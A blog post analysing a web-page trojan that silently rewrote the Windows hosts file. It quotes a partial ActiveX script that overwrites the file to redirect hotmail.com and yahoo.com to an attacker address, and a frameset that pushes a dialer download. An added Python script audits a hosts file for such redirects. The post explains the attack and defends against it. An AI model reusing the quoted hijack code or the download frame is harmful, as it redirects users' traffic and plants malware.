Best Greetings

The most likely way for
the world to be destroyed, most experts agree, is by accident. That’s
where we come in; we’re computer professionals. We cause accidents.

Intro

Earlier this year there was a write-up regarding the 'localhost' troubles experienced in February.
As suggested in that posting, the problems were apparently caused by
a web page (Best-Greetings) containing a hidden script (Java or VB)
that overwrote the localhost file. Since the page could not be recovered
from IE's cache, and thanks to fast action from Direct-Nic (who
pulled the pages before more 'damage' was done), only the big
question remained: how did it actually happen? Any programmer would be interested
in finding the answer to that question. The answer came in just
today: a referrer on my referrers page pointed to a search engine (CometSystems), and the page in question also linked to a page on a site maintained by Norman De Forest. Finally, a conclusion to something that has been bothering the author since February.

It’s a bird, it’s a plane, it’s a script (and such).

My first assumption was correct: a script triggers
something to write (or rather rewrite) the hosts file. That
'something' here is an ActiveX object; I don't think JavaScript has
explicit access to the (Windows) filesystem. The trick is in the
following code (fragment quoted from Norman's page):

function savefavfile(folder,label,url,icofile,iconum)
{
  // FSO is an ActiveX Scripting.FileSystemObject created elsewhere in the page.
  // The script creates (overwrites) the hosts file in the given folder, so the
  // names below resolve to the attacker's address instead of the real sites.
  var oFi=FSO.CreateTextFile(folder+"\hosts");
  oFi.WriteLine("64.154.222.199 hotmail.com");
  oFi.WriteLine("64.154.222.199 yahoo.com");
[…]

Hosts file? Basically, a hosts file lets the
'Internet' software connect to a website quickly by skipping the
'domain name look-up': a name listed in the file is resolved from the file
itself, before DNS is asked. For a layman's description of what it
exactly does, you may want to check here.
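As an added example (not code from the original post or from Norman's page), here is a small Python audit that reads a hosts file the way the resolver does and flags the footprint the script above leaves behind: public hostnames redirected to one routable address. The sample hosts content is constructed for this example; the only value taken from the page is the 64.154.222.199 address, and the heuristics in suspicious_entries are this example's own assumptions, not rules stated on the page.

```python
import ipaddress

# Constructed sample of a Windows hosts file after the hijack described above.
# The 64.154.222.199 address is the one quoted on this page; the other lines are
# what a stock hosts file looks like, plus one legitimate LAN alias.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
192.168.1.20    printer.lan     # legitimate local alias
64.154.222.199 hotmail.com
64.154.222.199 yahoo.com
"""

# Names that legitimately appear in a hosts file without being DNS names.
LOCAL_LABELS = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Return a list of (ip_address, hostname) pairs from hosts-file text.

    The resolver consults this file before it asks DNS, so every pair listed
    here short-circuits a name lookup. That is what makes the file useful and
    also what makes it a hijack target: an entry for hotmail.com silently
    wins over the real DNS answer.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and whitespace
        if not line:
            continue
        parts = line.split()
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                              # malformed address; skip it
        for name in parts[1:]:
            entries.append((addr, name.lower()))
    return entries


def suspicious_entries(entries):
    """Flag entries that redirect a public hostname to a routable address.

    Heuristics (assumptions of this example, not rules taken from the page):
      * an entry is expected if it names a local label, or maps any name to
        a loopback, private or link-local address (LAN aliases are normal);
      * a dotted hostname mapped to a routable (public) address is flagged;
      * several flagged names sharing one address is the exact footprint of
        the script quoted above, so those are reported separately.
    Returns (flagged, shared): a list of (ip, name) strings and a dict of
    ip -> [names] for addresses that collect more than one flagged name.
    """
    flagged = []
    by_ip = {}
    for addr, name in entries:
        if name in LOCAL_LABELS:
            continue
        if addr.is_loopback or addr.is_private or addr.is_link_local:
            continue
        if "." in name:
            flagged.append((str(addr), name))
            by_ip.setdefault(str(addr), []).append(name)
    shared = {ip: names for ip, names in by_ip.items() if len(names) > 1}
    return flagged, shared


def audit_hosts(text):
    """Convenience wrapper: parse, then flag; returns (flagged, shared)."""
    return suspicious_entries(parse_hosts(text))


if __name__ == "__main__":
    flagged, shared = audit_hosts(SAMPLE_HOSTS)
    for ip, name in flagged:
        print("redirected name: %-20s -> %s" % (name, ip))
    for ip, names in shared.items():
        print("%s collects %d unrelated names: %s" % (ip, len(names), ", ".join(names)))
```

To check a real machine, read the file from %SystemRoot%\System32\drivers\etc\hosts (Windows) or /etc/hosts (Unix) and pass its text to audit_hosts; the private-address exemption keeps ordinary LAN aliases quiet, while the "one public address, many well-known names" report is the signal worth a closer look.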

It’s a script, a frame and a download.

The next part that comes to mind is that my wife was
constantly bothered by a dialog box asking her if she wanted to
download a program. If I remember correctly, the dialog was in German
and it looked like a real 'signed' certificate. Back to Norman's page:

<FRAMESET rows="100%,*" framespacing=0 frameborder="no">
  <FRAME SRC="http://209.1.225.218/myfiles/amy.txt" noresize>
  <FRAME src="dialer.php" noresize>
</frameset>

The site in question asks the user to download an executable.
Apparently there was a check whether the program was already installed, but
I don't recall this: we skipped this part, and by that time I was
already cleaning out the hosts file.

Neat-o.

I must admit that on that particular night I was surprised by the
boldness of the 'trick'. As a programmer you try to keep up with the many
flaws of a 'flawed' system such as Windows, and you easily
overlook holes like these; combined with a 'social engineering' part (one
we have seen in many 'scripting viruses'), it's nearly impossible
to keep track of what regular users have done to 'upset their own
computers'. However, the most worrying part is that most
users have never heard of the 'hosts' file, let alone what that file
is used for. Ask yourself the following: had ordinary people
known about the workings of the 'hosts' file, they would have
recognized the symptoms described above.

Links/Acknowledgements:

Norman De Forest's page with the complete description of the trojan (recommended reading, 100K).

Thread at Google groups, as suggested by Norman.

Gorilla Design’s hosts file explanation in layman’s terms

First discussion on this blog.

This entry was posted in xsamplex.